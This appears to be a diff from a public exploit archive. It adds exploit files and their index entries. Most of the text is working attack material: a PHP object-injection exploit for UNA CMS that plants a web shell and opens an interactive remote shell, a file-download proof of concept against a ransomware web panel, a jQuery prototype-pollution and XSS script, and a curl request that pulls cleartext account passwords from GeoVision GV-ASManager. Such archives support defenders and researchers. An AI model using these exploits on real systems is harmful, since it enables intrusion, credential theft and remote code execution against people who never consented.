print "\nUsage......: php $argv[0] <URL>\n";
print "\nExample....: php $argv[0] http://localhost/una/";
print "\nExample....: php $argv[0] https://unacms.com/\n\n";
die();
}
define('ON_APACHE', true);
define('SH_PATH', ON_APACHE ? './cache_public/sh.phtml' : './cache_public/sh.php');
class GuzzleHttp_Cookie_SetCookie
{
private $data = ['Expires' => '', 'Value' => '<?php eval(base64_decode($_SERVER[\'HTTP_C\'])); ?>'];
}
class GuzzleHttp_Cookie_FileCookieJar
{
private $cookies, $filename = SH_PATH, $storeSessionCookies = true;
function __construct()
{
$this->cookies = [new GuzzleHttp_Cookie_SetCookie];
}
}
$url = $argv[1];
$ch = curl_init();
$chain = serialize(new GuzzleHttp_Cookie_FileCookieJar);
$chain = str_replace('GuzzleHttp_Cookie_SetCookie', 'GuzzleHttp\Cookie\SetCookie', $chain);
$chain = str_replace('GuzzleHttp_Cookie_FileCookieJar', 'GuzzleHttp\Cookie\FileCookieJar', $chain);
curl_setopt($ch, CURLOPT_URL, "{$url}menu.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_HTTPHEADER, ["X-Requested-With: XMLHttpRequest"]);
curl_setopt($ch, CURLOPT_POSTFIELDS, "o=sys_set_acl_level&a=SetAclLevel&level_id=1&profile_id=" . urlencode($chain));
print "\n[+] Performing PHP Object Injection";
curl_exec($ch); curl_close($ch);
print "\n[+] Launching shell\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url . SH_PATH);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$phpcode = "print '____'; print shell_exec(base64_decode('%s')); print '____';";
while(1)
{
print "\nuna-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}

71
exploits/multiple/webapps/52140.txt Normal file
View file

@ -0,0 +1,71 @@
# Exploit Title: Jasmin Ransomware - (Authenticated) Arbitrary File Download
# Google Dork: N/A
# Date: 22-03-2025
# Exploit Author: bRpsd cy[at]live.no
# Vendor Homepage: https://github.com/codesiddhant/Jasmin-Ransomware
# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware
# Version: N/A
# Tested on: MacOS local xampp
Authentication can be easily bypassed due to SQL Injection as mentioned in:
https://www.exploit-db.com/exploits/52091
Vulnerable file:Web Panel/download_file.php
Vulnerable parameter:file
Vulnerable code:
<?php
session_start();
if(!isset($_SESSION['username']) ){
header("Location: login.php");
}
$file=$_GET['file'];
if(!empty($file)){
// Define headers
header("Cache-Control: public");
header("Content-Description: File Transfer");
header("Content-Disposition: attachment; filename=$file");
header("Content-Type: text/encoded");
header("Content-Transfer-Encoding: binary");
// Read the file
readfile($file);
exit;
}else{
echo 'The file does not exist.';
}
?>
Proof of concept:
http://localhost/Jasmin-Ransomware/Web Panel/download_file.php?file=database/db_conection.php
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Cookie: PHPSESSID=88e519f73f9013f560ed3f0514015d8c
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
GET: HTTP/1.1 200 OK
Date: Sat, 22 Mar 2025 09:42:09 GMT
Server: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1
X-Powered-By: PHP/7.4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Content-Description: File Transfer
Content-Disposition: attachment; filename=database/db_conection.php
Content-Transfer-Encoding: binary
Content-Length: 95
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/encoded;charset=UTF-8

72
exploits/multiple/webapps/52141.txt Normal file
View file

@ -0,0 +1,72 @@
# Exploit Title: jQuery Prototype Pollution & XSS Exploit (CVE-2019-11358 & CVE-2020-7656)
# Google Dork: N/A
# Date: 2025-02-13
# Exploit Author: xOryus
# Vendor Homepage: https://jquery.com
# Software Link: https://code.jquery.com/jquery-3.3.1.min.js
# Version: 3.3.1
# Tested on: Windows 10, Ubuntu 20.04, Chrome 120, Firefox 112
# CVE : CVE-2019-11358, CVE-2020-7656
# Category: WebApps
# Description:
# This exploit abuses two vulnerabilities in jQuery:
# - CVE-2020-7656: XSS via improper script handling
# - CVE-2019-11358: Prototype Pollution leading to XSS
# By injecting payloads into a vulnerable page using jQuery <3.4.X, attackers can execute arbitrary JavaScript in the victim's browser.
#
# Usage:
# 1. Load this script in a page that includes jQuery 3.3.1
# 2. Observe two XSS alerts via script injection and prototype pollution.
# PoC (Proof of Concept):
# ------------------------------------
/*
* Exploit for CVE-2020-7656 and CVE-2019-11358
* Injects malicious JavaScript into a vulnerable page using jQuery <3.4.X
*/
COPY ALL PAYLOAD AND INSERT ON SITE AND IN BROWSER CONSOLE (F12)
// 1. Load vulnerable jQuery (version 3.3.1)
const script = document.createElement('script');
script.src = "https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js";
document.head.appendChild(script);
// 2. Function to execute after jQuery is loaded
script.onload = function() {
console.log("[+] Vulnerable jQuery loaded!");
// 3. Inject malicious content for XSS (CVE-2020-7656)
const maliciousContent = "<script>alert('XSS via CVE-2020-7656: ' + document.domain)</script >"; // Space after </script>
$('body').append(maliciousContent);
console.log("[+] XSS payload (CVE-2020-7656) injected. Alert will be displayed.");
// 4. Exploit Prototype Pollution (CVE-2019-11358)
const defaultConfig = {
"backLink": "<a href='https://example.com'>Go Back</a>"
};
const maliciousParams = {
"__proto__": {
"backLink": "<svg onload=alert('XSS via CVE-2019-11358: Prototype Pollution!')>"
}
};
// 5. Merge objects using vulnerable $.extend
let config = $.extend(true, defaultConfig, maliciousParams);
console.log("[+] Prototype Pollution executed via $.extend().");
// 6. Create a container to inject malicious content
const container = document.createElement('div');
container.id = 'backLinkContainer';
document.body.appendChild(container);
// 7. Inject malicious content into the DOM
$('#backLinkContainer').html(config.backLink);
console.log("[+] XSS payload (CVE-2019-11358) injected into the DOM. Alert will be displayed.");
};
// 8. Instruction message
console.log("[*] Script injected. Waiting for jQuery to load...");

46
exploits/multiple/webapps/52144.txt Normal file
View file

@ -0,0 +1,46 @@
# Exploit Title: Information Disclosure in GeoVision GV-ASManager
# Google Dork: inurl:"ASWeb/Login"
# Date: 02-FEB-2025
# Exploit Author: Giorgi Dograshvili [DRAGOWN]
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Version: 6.1.0.0 or less
# Tested on: Windows 10 | Kali Linux
# CVE : CVE-2024-56902
# PoC: https://github.com/DRAGOWN/CVE-2024-56902
Information disclosure vulnerability in Geovision GV-ASManager web application with version v6.1.0.0 or less.
Requirements
To perform successful attack an attacker requires:
- GeoVision ASManager version 6.1.0.0 or less
- Network access to the GV-ASManager web application (there are cases when there are public access)
- Access to Guest account (enabled by default), or any low privilege account (Username: Guest; Password: <blank>)
Impact
The vulnerability can be leveraged to perform the following unauthorized actions:
A low privilege account is able to:
- Enumerate user accounts
- Retrieve cleartext password of any account in GV-ASManager.
After reusing the retrieved password, an attacker will be able to:
- Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
- Disrupt and disconnect services such as monitoring cameras, access controls.
- Clone and duplicate access control data for further attack scenarios.
- Reusing retrieved password in other digital assets of the organization.
cURL script:
curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: [SET-TARGET]' -H $'Content-Length: 41' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'X-Requested-With: XMLHttpRequest' -H $'Accept-Language: en-US,en;q=0.9' -H $'Sec-Ch-Ua: \"Not?A_Brand\";v=\"99\", \"Chromium\";v=\"130\"' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36' -H $'Accept: */*' -H $'Origin: https://192.168.50.129' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Accept-Encoding: gzip, deflate, br' -H $'Priority: u=1, i' -H $'Connection: keep-alive' \
-b $'[SET-COOKIE - WRITE WHAT IS AFTER "Cookie:"]' \
--data-binary $'action=UA_GetAllUserAccount&node=xnode-98' \
$'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf'
After a successful attack, you will get access to:
- ASWeb - Access & Security Management
- TAWeb - Time and Attendance Management
- VMWeb - Visitor Management
- ASManager - Access & Security Management software in OS

8
files_exploits.csv
View file

@ -11031,6 +11031,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35729,exploits/multiple/remote/35729.txt,"Imperva SecureSphere - SQL Query Filter Security Bypass",2011-05-09,@drk1wi,remote,multiple,,2011-05-09,2015-01-08,1,,,,,,https://www.securityfocus.com/bid/47780/info
39455,exploits/multiple/remote/39455.txt,"Inductive Automation Ignition 7.8.1 - Remote Leakage Of Shared Buffers",2016-02-17,LiquidWorm,remote,multiple,,2016-02-18,2016-02-18,0,CVE-2015-2080,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php
46342,exploits/multiple/remote/46342.py,"Indusoft Web Studio 8.1 SP2 - Remote Code Execution",2019-02-11,"Jacob Baines",remote,multiple,,2019-02-11,2019-02-12,0,CVE-2019-6545;CVE-2019-6543,,,,,
52142,exploits/multiple/remote/52142.py,"InfluxDB OSS 2.7.11 - Operator Token Privilege Escalation",2025-04-08,"Andrea Pasin",remote,multiple,,2025-04-08,2025-04-08,0,CVE-2024-30896,,,,,
30973,exploits/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 - '.swf' Flash File Remote Code Execution",2008-01-02,"Rich Cannings",remote,multiple,,2008-01-02,2014-01-16,1,CVE-2008-6060;OSVDB-56437,,,,,https://www.securityfocus.com/bid/27109/info
21942,exploits/multiple/remote/21942.java,"Ingenium Learning Management System 5.1/6.1 - Reversible Password Hash",2002-10-15,"Brian Enigma",remote,multiple,,2002-10-15,2012-10-13,1,CVE-2002-1910;OSVDB-59780,,,,,https://www.securityfocus.com/bid/5970/info
20468,exploits/multiple/remote/20468.txt,"Inktomi Search Software 3.0 - Information Disclosure",2000-12-05,"china nsl",remote,multiple,,2000-12-05,2012-08-13,1,OSVDB-88577,,,,,https://www.securityfocus.com/bid/2062/info
@ -11486,6 +11487,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
31756,exploits/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple,,2008-05-08,2014-02-19,1,CVE-2008-2162;OSVDB-45017,,,,,https://www.securityfocus.com/bid/29107/info
24322,exploits/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload (Metasploit)",2013-01-24,Metasploit,remote,multiple,,2013-01-24,2013-01-24,1,CVE-2013-1359;OSVDB-89347,"Metasploit Framework (MSF)",,,,
21453,exploits/multiple/remote/21453.txt,"SonicWALL SOHO3 6.3 - Content Blocking Script Injection",2002-05-17,"E M",remote,multiple,,2002-05-17,2012-09-22,1,CVE-2002-2341;OSVDB-4408,,,,,https://www.securityfocus.com/bid/4755/info
52143,exploits/multiple/remote/52143.py,"Sony XAV-AX5500 1.13 - Firmware Update Validation Remote Code Execution (RCE)",2025-04-08,lkushinada,remote,multiple,,2025-04-08,2025-04-08,0,CVE-2024-23922,,,,,
22509,exploits/multiple/remote/22509.txt,"Sophos Products - Multiple Vulnerabilities",2012-11-05,"Tavis Ormandy",remote,multiple,,2012-11-05,2012-11-05,1,OSVDB-87063;OSVDB-87062;OSVDB-87061;OSVDB-87060;OSVDB-87059;OSVDB-87058;OSVDB-87057;OSVDB-87056,,,,,
48587,exploits/multiple/remote/48587.py,"SOS JobScheduler 1.13.3 - Stored Password Decryption",2020-06-15,"Sander Ubink",remote,multiple,,2020-06-15,2020-06-15,0,CVE-2020-12712,,,,,
50964,exploits/multiple/remote/50964.py,"Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)",2022-06-14,Altelus,remote,multiple,,2022-06-14,2022-06-14,0,CVE-2022-23642,,,,,
@ -11926,6 +11928,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51480,exploits/multiple/webapps/51480.txt,"FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)",2023-05-23,"Andrea Intilangelo",webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-25439,,,,,
50982,exploits/multiple/webapps/50982.txt,"Geonetwork 4.2.0 - XML External Entity (XXE)",2022-07-29,"Amel BOUZIANE-LEBLOND",webapps,multiple,,2022-07-29,2022-07-29,0,,,,,,
37757,exploits/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity",2015-08-12,"David Bloom",webapps,multiple,,2015-08-15,2017-11-02,0,OSVDB-125901,,,,,
52144,exploits/multiple/webapps/52144.txt,"GeoVision GV-ASManager 6.1.0.0 - Information Disclosure",2025-04-08,"Giorgi Dograshvili",webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2024-56902,,,,,
50181,exploits/multiple/webapps/50181.py,"GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)",2021-08-05,"Amin Bohio",webapps,multiple,,2021-08-05,2021-08-05,0,,,,,,
47407,exploits/multiple/webapps/47407.txt,"Gila CMS < 1.11.1 - Local File Inclusion",2019-09-23,"Sainadh Jamalpur",webapps,multiple,,2019-09-23,2019-09-23,0,CVE-2019-16679,,,,http://www.exploit-db.comgila-1.10.9.zip,
49571,exploits/multiple/webapps/49571.py,"Gitea 1.12.5 - Remote Code Execution (Authenticated)",2021-02-18,Podalirius,webapps,multiple,,2021-02-18,2021-06-14,0,,,,,,
@ -11997,6 +12000,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49372,exploits/multiple/webapps/49372.txt,"IPeakCMS 3.5 - Boolean-based blind SQLi",2021-01-06,MoeAlBarbari,webapps,multiple,,2021-01-06,2021-01-06,0,CVE-2021-3018,,,,,
50490,exploits/multiple/webapps/50490.txt,"Isshue Shopping Cart 3.5 - 'Title' Cross Site Scripting (XSS)",2021-11-03,Vulnerability-Lab,webapps,multiple,,2021-11-03,2021-11-03,0,,,,,,
52062,exploits/multiple/webapps/52062.py,"Ivanti vADC 9.9 - Authentication Bypass",2024-08-04,ohnoisploited,webapps,multiple,,2024-08-04,2024-08-04,0,,,,,,
52140,exploits/multiple/webapps/52140.txt,"Jasmin Ransomware - Arbitrary File Download (Authenticated)",2025-04-08,bRpsd,webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
44623,exploits/multiple/webapps/44623.txt,"JasperReports - (Authenticated) File Read",2018-05-03,"Hector Monsegur",webapps,multiple,,2018-05-15,2018-05-15,0,CVE-2018-5430,,,,,https://rhinosecuritylabs.com/application-security/authenticated-file-read-vulnerability-in-jasperreports/
36575,exploits/multiple/webapps/36575.py,"JBoss AS 3/4/5/6 - Remote Command Execution",2015-03-31,"João Filho Matos Figueiredo",webapps,multiple,,2015-04-13,2015-04-13,0,OSVDB-120064,,,,,
35911,exploits/multiple/webapps/35911.txt,"jclassifiedsmanager - Multiple Vulnerabilities",2015-01-26,"Sarath Nair",webapps,multiple,,2015-01-26,2015-01-26,0,OSVDB-117568;OSVDB-117567;CVE-2015-1478;CVE-2015-1477,,,,,
@ -12018,6 +12022,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48147,exploits/multiple/webapps/48147.txt,"Joplin Desktop 1.0.184 - Cross-Site Scripting",2020-03-02,"Javier Olmedo",webapps,multiple,,2020-03-02,2020-03-02,0,CVE-2020-9038,,,,,
49767,exploits/multiple/webapps/49767.txt,"jQuery 1.0.3 - Cross-Site Scripting (XSS)",2021-04-14,"Central InfoSec",webapps,multiple,,2021-04-14,2021-04-14,0,CVE-2020-11023,,,,,
49766,exploits/multiple/webapps/49766.txt,"jQuery 1.2 - Cross-Site Scripting (XSS)",2021-04-14,"Central InfoSec",webapps,multiple,,2021-04-14,2021-04-14,0,CVE-2020-11022,,,,,
52141,exploits/multiple/webapps/52141.txt,"jQuery 3.3.1 - Prototype Pollution & XSS Exploit",2025-04-08,xOryus,webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2020-7656;CVE-2019-11358,,,,,
11218,exploits/multiple/webapps/11218.txt,"jQuery Uploadify 2.1.0 - Arbitrary File Upload",2010-01-21,k4cp3r/Ablus,webapps,multiple,,2010-01-20,,1,,,,,http://www.exploit-db.comjquery.uploadify-v2.1.0.zip,
38641,exploits/multiple/webapps/38641.rb,"JSSE - SKIP-TLS",2015-11-05,"Ramon de C Valle",webapps,multiple,,2015-11-05,2015-11-05,0,CVE-2014-6593;OSVDB-117238,,,,,
38424,exploits/multiple/webapps/38424.txt,"Kallithea 0.2.9 - 'came_from' HTTP Response Splitting",2015-10-08,LiquidWorm,webapps,multiple,,2015-10-11,2015-10-11,0,CVE-2015-5285,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5267.php
@ -12112,6 +12117,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48772,exploits/multiple/webapps/48772.txt,"Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting",2020-08-28,"Jinson Varghese Behanan",webapps,multiple,,2020-08-28,2020-08-28,0,,,,,,
49082,exploits/multiple/webapps/49082.txt,"Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting",2020-11-19,"Emre ÖVÜNÇ",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
52117,exploits/multiple/webapps/52117.md,"Nagios Log Server 2024R1.3.1 - Stored XSS",2025-04-03,"Seth Kraft",webapps,multiple,,2025-04-03,2025-04-03,0,,,,,,
52138,exploits/multiple/webapps/52138.txt,"Nagios Xi 5.6.6 - Authenticated Remote Code Execution (RCE)",2025-04-08,"Calil Khalil",webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2019-15949,,,,,
51925,exploits/multiple/webapps/51925.py,"Nagios XI Version 2024R1.01 - SQL Injection",2024-03-25,"Jarod Jaslow (MAWK)",webapps,multiple,,2024-03-25,2024-03-25,0,,,,,,
41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,80,2017-03-08,2018-11-20,0,,"SQL Injection (SQLi)",,,,
41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,80,2017-03-08,2018-11-20,0,,"Cross-Site Scripting (XSS)",,,,
@ -12359,6 +12365,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44350,exploits/multiple/webapps/44350.py,"TwonkyMedia Server 7.0.11-8.5 - Directory Traversal",2018-03-28,"Sven Fassbender",webapps,multiple,,2018-03-28,2018-03-28,0,CVE-2018-7171,,,,http://www.exploit-db.comTwonkyServer-8.5.exe,
44351,exploits/multiple/webapps/44351.txt,"TwonkyMedia Server 7.0.11-8.5 - Persistent Cross-Site Scripting",2018-03-28,"Sven Fassbender",webapps,multiple,,2018-03-28,2018-03-28,0,CVE-2018-7203,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comTwonkyServer-8.5.exe,
47198,exploits/multiple/webapps/47198.txt,"Ultimate Loan Manager 2.0 - Cross-Site Scripting",2019-08-01,"Metin Yunus Kandemir",webapps,multiple,80,2019-08-01,2019-08-02,0,,"Cross-Site Scripting (XSS)",,,,
52139,exploits/multiple/webapps/52139.txt,"UNA CMS 14.0.0-RC - PHP Object Injection",2025-04-08,"Egidio Romano",webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
49150,exploits/multiple/webapps/49150.txt,"Under Construction Page with CPanel 1.0 - SQL injection",2020-12-02,"Mayur Parmar",webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
47058,exploits/multiple/webapps/47058.txt,"Varient 1.6.1 - SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,multiple,80,2019-07-01,2019-07-03,0,,"SQL Injection (SQLi)",,,,
43362,exploits/multiple/webapps/43362.md,"vBulletin 5.x - 'cacheTemplates' Remote Arbitrary File Deletion",2017-12-13,SecuriTeam,webapps,multiple,,2017-12-18,2019-10-01,0,CVE-2017-17672,,,,,https://blogs.securiteam.com/index.php/archives/3573
@ -12414,6 +12421,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41692,exploits/multiple/webapps/41692.rb,"WordPress Plugin Ninja Forms 2.9.36 < 2.9.42 - File Upload (Metasploit)",2016-05-04,Metasploit,webapps,multiple,,2017-03-23,2017-03-23,1,CVE-2016-1209;OSVDB-8485,,,,,https://github.com/rapid7/metasploit-framework/blob/8cd9a9b6708c4a175d5175879169188dc8014a51/modules/exploits/multi/http/wp_ninja_forms_unauthenticated_file_upload.rb
49252,exploits/multiple/webapps/49252.txt,"WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download",2020-12-14,Wadeek,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
33937,exploits/multiple/webapps/33937.txt,"WordPress Plugin TYPO3 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,webapps,multiple,,2010-05-05,2016-09-26,1,,,,,,https://www.securityfocus.com/bid/39926/info
52137,exploits/multiple/webapps/52137.txt,"WordPress User Registration & Membership Plugin 4.1.1 - Unauthenticated Privilege Escalation",2025-04-08,"Al Baradi Joy",webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
37573,exploits/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",webapps,multiple,,2012-08-06,2015-07-11,1,,,,,,https://www.securityfocus.com/bid/54812/info
40134,exploits/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Cross-Site Request Forgery (Add Advanced Admin)",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5341.php
40135,exploits/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting Vulnerabilities",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5343.php

Can't render this file because it is too large.